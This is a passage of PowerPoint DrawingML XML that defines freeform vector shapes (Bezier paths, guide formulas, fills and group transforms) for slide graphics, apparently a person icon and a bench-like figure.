                        <a:cubicBezTo>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="84"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="223" y="32"/>
                          <a:pt x="207" y="26"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="90" y="4"/>
                          <a:pt x="87" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="29" y="102"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="108"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="65"/>
                          <a:pt x="111" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="117"/>
                          <a:pt x="109" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="165"/>
                          <a:pt x="112" y="170"/>
                          <a:pt x="119" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="173"/>
                          <a:pt x="162" y="183"/>
                          <a:pt x="169" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="186"/>
                          <a:pt x="193" y="176"/>
                          <a:pt x="196" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="163"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="209" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="154"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="141"/>
                          <a:pt x="237" y="135"/>
                          <a:pt x="237" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="113"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="193" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="96"/>
                          <a:pt x="198" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="123"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="193" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="193" y="73"/>
                          <a:pt x="193" y="75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74118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14" name="Freeform 59">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4D793A-D57B-4AC9-BF0C-74F0AD65D3B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346" y="2662"/>
                    <a:ext cx="87" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="48" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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15" name="Freeform 60">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF54F7B6-F74D-485D-9090-473409EA03A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240" y="2886"/>
                    <a:ext cx="209" cy="237"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 159 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 132 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 81 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 72 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 68 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 17 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 1 w 159"/>
                      <a:gd name="T13" fmla="*/ 55 h 180"/>
                      <a:gd name="T14" fmla="*/ 1 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 36 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 43 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 42 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 42 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 42 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 42 w 159"/>
                      <a:gd name="T27" fmla="*/ 66 h 180"/>
                      <a:gd name="T28" fmla="*/ 42 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 42 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 59 w 159"/>
                      <a:gd name="T33" fmla="*/ 41 h 180"/>
                      <a:gd name="T34" fmla="*/ 103 w 159"/>
                      <a:gd name="T35" fmla="*/ 30 h 180"/>
                      <a:gd name="T36" fmla="*/ 103 w 159"/>
                      <a:gd name="T37" fmla="*/ 30 h 180"/>
                      <a:gd name="T38" fmla="*/ 59 w 159"/>
                      <a:gd name="T39" fmla="*/ 41 h 180"/>
                      <a:gd name="T40" fmla="*/ 42 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 42 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 42 w 159"/>
                      <a:gd name="T45" fmla="*/ 72 h 180"/>
                      <a:gd name="T46" fmla="*/ 42 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 42 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 43 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 43 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 43 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 84 w 159"/>
                      <a:gd name="T57" fmla="*/ 157 h 180"/>
                      <a:gd name="T58" fmla="*/ 85 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 89 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 141 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 159 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 159 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 159 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="159" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="17"/>
                          <a:pt x="140" y="23"/>
                          <a:pt x="132" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="20"/>
                          <a:pt x="94" y="14"/>
                          <a:pt x="81" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="10"/>
                          <a:pt x="73" y="5"/>
                          <a:pt x="72" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="19"/>
                          <a:pt x="72" y="18"/>
                          <a:pt x="68" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="19"/>
                          <a:pt x="28" y="28"/>
                          <a:pt x="17" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="36"/>
                          <a:pt x="2" y="42"/>
                          <a:pt x="1" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="163"/>
                          <a:pt x="25" y="165"/>
                          <a:pt x="36" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="153"/>
                          <a:pt x="43" y="149"/>
                          <a:pt x="43" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="130"/>
                          <a:pt x="42" y="102"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="68"/>
                          <a:pt x="42" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="63"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="50"/>
                          <a:pt x="48" y="44"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="37"/>
                          <a:pt x="101" y="30"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="28"/>
                          <a:pt x="107" y="28"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="30"/>
                          <a:pt x="68" y="37"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="44"/>
                          <a:pt x="43" y="50"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="74"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="155"/>
                          <a:pt x="43" y="156"/>
                          <a:pt x="43" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="180"/>
                          <a:pt x="84" y="177"/>
                          <a:pt x="84" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="142"/>
                          <a:pt x="85" y="80"/>
                          <a:pt x="85" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="74"/>
                          <a:pt x="87" y="70"/>
                          <a:pt x="89" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="69"/>
                          <a:pt x="136" y="57"/>
                          <a:pt x="141" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="153" y="52"/>
                          <a:pt x="159" y="47"/>
                          <a:pt x="159" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="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74118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16" name="Oval 61">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D40792-B724-4965-87CB-D7FBD5D9E5B9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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2336" y="2591"/>
                    <a:ext cx="105" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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17" name="Freeform 62">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBD65E7-F3B0-4875-9668-18DB5FFB432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356" y="2721"/>
                    <a:ext cx="35" cy="165"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 55"/>
                      <a:gd name="T1" fmla="*/ 0 h 265"/>
                      <a:gd name="T2" fmla="*/ 14 w 55"/>
                      <a:gd name="T3" fmla="*/ 22 h 265"/>
                      <a:gd name="T4" fmla="*/ 5 w 55"/>
                      <a:gd name="T5" fmla="*/ 239 h 265"/>
                      <a:gd name="T6" fmla="*/ 29 w 55"/>
                      <a:gd name="T7" fmla="*/ 265 h 265"/>
                      <a:gd name="T8" fmla="*/ 52 w 55"/>
                      <a:gd name="T9" fmla="*/ 253 h 265"/>
                      <a:gd name="T10" fmla="*/ 38 w 55"/>
                      <a:gd name="T11" fmla="*/ 29 h 265"/>
                      <a:gd name="T12" fmla="*/ 55 w 55"/>
                      <a:gd name="T13" fmla="*/ 15 h 265"/>
                      <a:gd name="T14" fmla="*/ 0 w 55"/>
                      <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="14" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="239"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="52" y="253"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="38" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="1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40505"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat">
                    <a:solidFill>
                      <a:schemeClr val="bg1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18" name="Freeform 63">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC694E87-88E0-434D-A747-49E37AFBE7B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356" y="2840"/>
                    <a:ext cx="119" cy="71"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 28 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="8"/>
                          <a:pt x="28" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="66" y="38"/>
                          <a:pt x="91" y="32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74118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880" name="Group 64">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DECD01E-5433-48B9-8C79-629E9D286EE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flipH="1">
                  <a:off x="1653" y="1949"/>
                  <a:ext cx="429" cy="228"/>
                  <a:chOff x="786" y="2382"/>
                  <a:chExt cx="1190" cy="634"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1901" name="Freeform 65">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E21B955-20EC-4B49-9234-5917BC38E24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1933" y="2464"/>
                    <a:ext cx="43" cy="322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02" name="Freeform 66">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064B9CE4-D664-406D-8213-AA33DE86249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1888" y="2464"/>
                    <a:ext cx="45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3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03" name="Freeform 67">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D7FB2FF-A5BA-441B-9879-6B860844A5F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1038" y="2694"/>
                    <a:ext cx="46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4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4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04" name="Freeform 68">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6ADDAE3-DF78-4EE1-BF1F-97496CC9DE0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1084" y="2694"/>
                    <a:ext cx="42" cy="322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4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05" name="Freeform 69">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7353E82-81FB-4911-9F57-E0C9757FB51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786" y="2625"/>
                    <a:ext cx="45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3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06" name="Freeform 70">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC36438D-416E-4C23-B4A3-F0BCB2645B3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831" y="2625"/>
                    <a:ext cx="43" cy="322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07" name="Freeform 71">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C01830-5BA1-434F-8C1D-E5B4D94EDA5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1633" y="2382"/>
                    <a:ext cx="42" cy="325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08" name="Freeform 72">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40415D9-B013-41B1-9B97-BDEB997C515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1633" y="2394"/>
                    <a:ext cx="42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4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4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09" name="Freeform 73">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D003D863-BC48-455E-8889-C8109F0D72A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1675" y="2394"/>
                    <a:ext cx="46" cy="322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4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10" name="Freeform 74">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E61361B-A851-4C0E-8309-24960FBD4A9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786" y="2382"/>
                    <a:ext cx="1190" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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11" name="Freeform 75">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{439C513B-F383-4C7F-9B19-F29E052459D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1084" y="2464"/>
                    <a:ext cx="892" cy="285"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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12" name="Freeform 76">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019736DC-7042-4885-967C-28C03A5758A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786" y="2625"/>
                    <a:ext cx="298" cy="124"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
